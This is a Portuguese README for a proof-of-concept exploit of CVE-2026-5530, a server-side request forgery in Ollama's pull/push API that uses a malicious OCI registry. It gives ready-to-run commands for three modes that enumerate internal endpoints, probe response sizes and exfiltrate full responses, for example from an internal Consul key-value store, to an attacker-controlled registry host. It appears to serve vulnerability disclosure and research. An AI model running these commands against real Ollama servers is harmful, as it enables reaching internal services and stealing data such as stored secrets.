
Prova de conceito de exploit para CVE-2026-5530, uma SSRF na API Pull/Push do Ollama, permitindo enumeração de endpoints internos e exfiltração completa de respostas por meio de um registro OCI malicioso.
SSRF no Ollama via redirecionamento de registro OCI com exfiltração completa da resposta.
Writeup: https://davidrochester.com/posts/cve-2026-5530
O Ollama foi contatado várias vezes sem resposta.
Três modos: enum, exfil e probe.
Encontra endpoints internos ativos acessíveis a partir do host do Ollama.
python3 poc.py targets.txt --registry-host <seu-ip>
Exfiltra respostas SSRF quando você sabe o tamanho da resposta.
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <seu-ip>
Faz busca binária pelo tamanho da resposta automaticamente e depois exfiltra.
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <seu-ip>
target URL ou arquivo de URLs (uma por linha, # para comentários)
-p, --port porta do registro malicioso (padrão: 9999)
--exfil-port porta do registro de exfiltração (padrão: 10000)
--exfil modo exfil, requer --size
--probe busca binária pelo tamanho e depois exfiltra
--size Content-Length (obrigatório com --exfil)
--registry-host seu IP/hostname de atacante que o Ollama consegue acessar
--ollama URL da API do Ollama (padrão: http://127.0.0.1:11434)